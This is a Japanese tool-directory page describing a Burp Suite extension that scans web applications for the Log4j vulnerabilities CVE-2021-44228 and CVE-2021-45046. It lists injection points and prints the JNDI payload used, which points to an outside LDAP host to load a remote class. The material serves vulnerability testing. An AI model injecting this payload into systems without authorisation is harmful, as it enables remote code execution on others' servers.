Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Burp-Log4j-HammerTime — Log4jの脆弱性CVE-2021-44228およびCVE-2021-45046を特定するためのBurp Active Scan拡張機能 | Kitploit
ツール/GitHubGitHub/dxc-strikeforce/burp-log4j-hammertime
脆弱性スキャナー動的分析 (サンドボックス)エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubdxc-strikeforce/burp-log4j-hammertime

Burp-Log4j-HammerTime

Log4jの脆弱性CVE-2021-44228およびCVE-2021-45046を特定するためのBurp Active Scan拡張機能

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
84年前未レビュー

Log4j-HammerTime

このBurp Suite Active Scanner拡張機能は、Apache Log4jのCVE-2021-44228およびCVE-2021-45046の脆弱性への悪用を検証します。

この拡張機能は、問題を検証するためにBurp Collaboratorを使用します。

使用方法

  • この拡張機能を有効にします
  • 特定のターゲットに対してアクティブスキャンを開始します

このモジュールのチェックのみを実行したい場合は、extensions-only.json プロファイルをインポートし、アクティブスキャンプロファイルとして選択できます。

詳細

アクティブスキャン中、この拡張機能では以下の挿入ポイントが試行されます:

  • HEADER
  • PARAM_NAME_BODY
  • PARAM_BODY
  • PARAM_NAME_URL
  • PARAM_URL
  • PARAM_COOKIE
  • PARAM_JSON
  • ENTIRE_BODY

各挿入ポイントで、リクエストには以下のペイロードが注入されます: ${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}

さらに、この拡張機能は、headers で有効化されている(コメントアウトされていない行の)多くのヘッダーを追加します。 これらのヘッダーは、それぞれ別々のリクエストで1つずつ注入されます。

法的免責事項

このプロジェクトは、教育および倫理的なテスト目的のみで作成されています。事前の相互同意なしにターゲットを攻撃するためのLog4Shell-active-scannerの使用は違法です。適用される地域、州、連邦のすべての法律を遵守する責任はエンドユーザーにあります。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。

ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。

作成者

  • Freskimo
ツールをダウンロード